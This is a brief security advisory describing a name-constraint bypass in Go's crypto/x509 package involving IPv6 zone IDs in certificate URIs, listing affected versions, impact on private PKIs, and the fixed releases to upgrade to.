Golang crypto/x509 Package URI Name Constraint Bypass Vulnerability via IPv6 Zone IDs

A vulnerability exists in the Go programming language's crypto/x509 package, specifically in versions 1.10-beta1 prior to 1.22.11, 1.23.0-0 prior to 1.23.5, and 1.24.0-0 prior to 1.24.0-rc.2. This vulnerability allows a certificate with a URI containing an IPv6 address with a zone ID to incorrectly satisfy a URI name constraint in the certificate chain. While URIs are not allowed in web PKI, this issue affects private PKIs that do use URIs.

Impact

Exploitation of this vulnerability can lead to a bypass of URI name constraints, potentially allowing for incorrect certificate validation in the context of a private PKI.

Remediation

Users can upgrade to Go versions 1.22.11, 1.23.5, or 1.24.0-rc.2, all of which include the necessary fix. Instructions for downloading these versions are available on the Go website.